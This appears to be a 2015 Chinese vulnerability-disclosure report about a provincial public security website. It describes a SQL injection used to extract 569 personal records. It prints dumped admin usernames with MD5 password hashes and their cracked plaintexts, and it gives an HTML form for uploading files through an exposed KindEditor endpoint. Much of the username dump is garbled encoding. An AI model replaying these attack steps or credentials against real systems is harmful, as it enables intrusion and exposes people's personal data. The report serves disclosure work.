2015-11-06: 细节已通知厂商并且等待厂商处理中 2015-11-11: 厂商已经主动忽略漏洞,细节向公众公开
SQL注入 569条姓名、身份证、电话、邮箱、单位等信息
注入点:
**.**.**.**:8188/website/mail/xiangxi.jsp?id=000028450141
569条姓名、身份证、电话、邮箱、单位等信息sqlmap爬数据
解密MD5密文
PWD,USER_NAME96E79218965EB72C92A549DD5A330112,adminzdh96E79218965EB72C92A549DD5A330112,adminytkjE0CCCD4C758FE1B1E4249365B6E96D9D,½»¹Ü×ܶÓE10ADC3949BA59ABBE56E057F20F883E,adminE10ADC3949BA59ABBE56E057F20F883E,sysadminE10ADC3949BA59ABBE56E057F20F883E,ºôºÍºÆÌØÊÐE10ADC3949BA59ABBE56E057F20F883E,¼ÍίE10ADC3949BA59ABBE56E057F20F883E,¶½²ì×ܶÓE10ADC3949BA59ABBE56E057F20F883E,Éó¼Æ´¦E10ADC3949BA59ABBE56E057F20F883E,°ì¹«ÊÒE10ADC3949BA59ABBE56E057F20F883E,ÕþÖβ¿E10ADC3949BA59ABBE56E057F20F883E,ÐÌÕì×ܶÓE10ADC3949BA59ABBE56E057F20F883E,Íø°²×ܶÓE10ADC3949BA59ABBE56E057F20F883E,·´¿Ö×ܶÓE10ADC3949BA59ABBE56E057F20F883E,±ß·À×ܶÓE10ADC3949BA59ABBE56E057F20F883E,Ïû·À×ܶÓE10ADC3949BA59ABBE56E057F20F883E,¾¯ÎÀ¾ÖE10ADC3949BA59ABBE56E057F20F883E,³öÈë¾³¹ÜÀí¾ÖE10ADC3949BA59ABBE56E057F20F883E,ÈËÊÂѵÁ·´¦E10ADC3949BA59ABBE56E057F20F883E,Ðû´«´¦E10ADC3949BA59ABBE56E057F20F883E,ÏÖÒÛ°ìE10ADC3949BA59ABBE56E057F20F883E,Ö¸»ÓÖÐÐÄE10ADC3949BA59ABBE56E057F20F883E,¹ú±£×ܶÓE10ADC3949BA59ABBE56E057F20F883E,¾Õì×ܶÓE10ADC3949BA59ABBE56E057F20F883E,Öΰ²×ܶÓE10ADC3949BA59ABBE56E057F20F883E,°üÍ·ÊÐE10ADC3949BA59ABBE56E057F20F883E,liangfengE10ADC3949BA59ABBE56E057F20F883E,¼à¹Ü×ܶÓE10ADC3949BA59ABBE56E057F20F883E,·¨ÖƾÖE10ADC3949BA59ABBE56E057F20F883E,¾¯±£²¿E10ADC3949BA59ABBE56E057F20F883E,½û¶¾×ܶÓE10ADC3949BA59ABBE56E057F20F883E,¿ÆОÖE10ADC3949BA59ABBE56E057F20F883E,ÐÐÕþ¹ÜÀí´¦E10ADC3949BA59ABBE56E057F20F883E,а½ÌÕì²ì×ܶÓE10ADC3949BA59ABBE56E057F20F883E,»ú¹Øµ³Î¯E10ADC3949BA59ABBE56E057F20F883E,Ç鱨ÖÐÐÄE10ADC3949BA59ABBE56E057F20F883E,Ðŷô¦E10ADC3949BA59ABBE56E057F20F883E,º£À¶ûº½¿Õ¿Ú°¶´¦E10ADC3949BA59ABBE56E057F20F883E,¾¯È®»ùµØE10ADC3949BA59ABBE56E057F20F883E,×ÔÖÎÇø¿´ÊØËùE10ADC3949BA59ABBE56E057F20F883E,¾¯²ìѧԺE10ADC3949BA59ABBE56E057F20F883E,¾¯²ìлáE10ADC3949BA59ABBE56E057F20F883E,¹«°²ÎÄÁªE10ADC3949BA59ABBE56E057F20F883E,ÎÚº£ÊÐE10ADC3949BA59ABBE56E057F20F883E,³à·åÊÐE10ADC3949BA59ABBE56E057F20F883E,ͨÁÉÊÐE10ADC3949BA59ABBE56E057F20F883E,¶õ¶û¶à˹ÊÐE10ADC3949BA59ABBE56E057F20F883E,ºôÂ×±´¶ûÊÐE10ADC3949BA59ABBE56E057F20F883E,ÎÚÀ¼²ì²¼ÊÐE10ADC3949BA59ABBE56E057F20F883E,°ÍÑåÄ׶ûÊÐE10ADC3949BA59ABBE56E057F20F883E,ÐË°²ÃËE10ADC3949BA59ABBE56E057F20F883E,°¢ÀÉÆÃËE10ADC3949BA59ABBE56E057F20F883E,ÎýÁÖ¹ùÀÕÃËE10ADC3949BA59ABBE56E057F20F883E,ÂúÖÞÀïÊÐE10ADC3949BA59ABBE56E057F20F883E,¶þÁ¬ºÆÌØÊÐ
96E79218965EB72C92A549DD5A330112 明文:111111E10ADC3949BA59ABBE56E057F20F883E 明文:123456
公安厅也用弱口令,醉了进后台
**.**.**.**:8188/sysadmin/login.jsp
出于好奇,看了下警民互动里面的各个选项,看到了姓名、身份证、邮箱、电话号码、单位、地址等诸多信息
共569条姓名、身份证、电话、邮箱、单位等信息又找到了Kindeditor 4.1.10版本的编辑器
找出了地址:
**.**.**.**:8188/Kindeditor/
然而是jsp的站
**.**.**.**:8188/Kindeditor/jsp
**.**.**.**:8188/Kindeditor/jsp/upload_json.jsp?dir=file可以post上传文件构造上传表单
<form action='**.**.**.**:8188/Kindeditor/jsp/upload_json.jsp?dir=file' enctype="multipart/form-data" method="post"><input type="file" name="imgFile"><input type="submit"></form>
上传成功
结果
看详细说明
升级站点程序,开启防注入、伪静态
危害等级:无影响厂商忽略
忽略时间:2015-11-11 09:54
暂无